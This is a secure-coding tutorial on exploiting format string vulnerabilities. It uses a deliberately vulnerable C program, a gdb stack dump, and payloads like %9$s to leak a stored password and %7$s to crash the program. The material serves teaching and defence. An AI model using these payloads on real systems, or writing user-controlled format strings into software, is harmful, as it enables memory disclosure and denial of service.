How to exploit format string vulnerabilities
In the previous articles, we discussed printing functions, format strings and format string vulnerabilities. This article provides an overview of how format string vulnerabilities can be exploited.
In this article, we will begin by solving a simple challenge to leak a secret from memory. In the next article, we will discuss another example, where we will chain a format string vulnerability and a buffer overflow vulnerability for greater impact.
Learn Secure Coding
How can format string vulnerabilities be exploited?
As mentioned in the previous article, the following are some of the attacks possible using format string vulnerabilities.
- Leaking secrets
- Denial of Service
- Leaking memory addresses
- Overwriting memory addresses
In this article, let us discuss the first two items.
Leaking secrets from stack
The following vulnerable program illustrates how a simple format string vulnerability can be exploited to read data from memory.
#include <stdio.h>

int main(int argc, char *argv[]){
    char *secret = "p@ssw0rD";
    printf(argv[1]); /* user input is used as the format string */
}
As we can notice, the program has a format string vulnerability: printf receives user input (argv[1]) as its format string. Because the input is not passed as an argument to a fixed format such as "%s", any conversion specifiers it contains are interpreted by printf.
Let us run the program in gdb, check the disassembly of the main function and set a breakpoint at the address of the printf call.
gef➤ disass main
Dump of assembler code for function main:
0x0000000000401136 <+0>: endbr64
0x000000000040113a <+4>: push rbp
0x000000000040113b <+5>: mov rbp,rsp
0x000000000040113e <+8>: sub rsp,0x20
0x0000000000401142 <+12>: mov DWORD PTR [rbp-0x14],edi
0x0000000000401145 <+15>: mov QWORD PTR [rbp-0x20],rsi
0x0000000000401149 <+19>: lea rax,[rip+0xeb4] # 0x402004
0x0000000000401150 <+26>: mov QWORD PTR [rbp-0x8],rax
0x0000000000401154 <+30>: mov rax,QWORD PTR [rbp-0x20]
0x0000000000401158 <+34>: add rax,0x8
0x000000000040115c <+38>: mov rax,QWORD PTR [rax]
0x000000000040115f <+41>: mov rdi,rax
0x0000000000401162 <+44>: mov eax,0x0
0x0000000000401167 <+49>: call 0x401040 <printf@plt>
0x000000000040116c <+54>: mov eax,0x0
0x0000000000401171 <+59>: leave
0x0000000000401172 <+60>: ret
End of assembler dump.
gef➤
gef➤ b *0x0000000000401167
gef➤ run
As we can see in the preceding excerpt, we have started the program, and the breakpoint should be hit.
If the breakpoint is hit, we are about to execute the printf function. If we examine the stack at this point, we should notice the address of the string p@ssw0rD on the stack, as shown below.
0x00007fffffffdf40│+0x0000: 0x00007fffffffe058 → 0x00007fffffffe380
0x00007fffffffdf48│+0x0008: 0x0000000100401050
0x00007fffffffdf50│+0x0010: 0x00007fffffffe050 → 0x0000000000000001
0x00007fffffffdf58│+0x0018: 0x0000000000402004 → "p@ssw0rD"
0x00007fffffffdf60│+0x0020: 0x0000000000000000 ← $rbp
0x00007fffffffdf68│+0x0028: 0x00007ffff7ded0b3 → <__libc_start_main+243> mov edi, eax
0x00007fffffffdf70│+0x0030: 0x00007ffff7ffc620 → 0x0005043700000000
0x00007fffffffdf78│+0x0038: 0x00007fffffffe058 → 0x00007fffffffe380 →
As we can see in the preceding excerpt, there is an address (0x0000000000402004) on the stack, which is pointing to the string "p@ssw0rD".
Our objective is to leak this string using the format string vulnerability existing in the vulnerable program.
Let us pass multiple %llx specifiers as user input, separated by colons. %llx prints an unsigned long long value in hexadecimal, so each specifier prints one full 64-bit value, which suits a 64-bit target.
The output looks as follows.
As we can notice in the preceding output, the address 402004 is leaked. This is the same address we noticed on the stack earlier, which means we are able to leak the address of the string p@ssw0rD.
We specified multiple %llx specifiers to be able to find the address, and the rest of the entries dumped from the stack are not useful to us. So, we can choose to dump only the value that we want by using Direct Parameter Access, which selects an argument by its position. In this case, the 9th value is the address. We can use %9$llx to directly access this address. This looks as follows.
402004
$
As we can notice, we managed to leak just the address that we wanted. However, we have leaked the address and not the actual string value. To leak the string itself, we can use %9$s. This asks the printf function to treat the 9th value as a pointer and print the string it points to. This looks as follows.
p@ssw0rD
$
We managed to leak the secret string through its address on the stack by using the format string vulnerability in the target binary.
Crashing the program
In the previous section, we used %9$s as our format specifier and dumped the secret string. This technique worked because the 9th value is a valid address that points to our secret string.
If we try to access an invalid memory location in a similar fashion, the result is a segmentation fault that crashes the program. The following excerpt shows that using %7$s, which treats the 7th value as the address of a string, causes a segmentation fault since that value is not a valid address.
Segmentation fault (core dumped)
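$
The crash occurred because the value at the 7th position is not a valid address. Such a value could be an address from kernel space or a non-address value such as a simple integer or character. In the earlier stack dump, the entry at this position (offset +0x0008) held 0x0000000100401050, which is not a pointer to a string.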
These two examples clearly show how format string vulnerabilities can be used to leak memory and crash the program.
Conclusion
Format string vulnerabilities can cause serious damage when exploited. As shown in this article, an attacker can use them to read data from memory and even crash the application. The impact can be greater if these vulnerabilities are chained with other vulnerabilities such as buffer overflows. In the next article, we will discuss how one can chain format string vulnerabilities and buffer overflows to bypass memory protections such as stack canaries.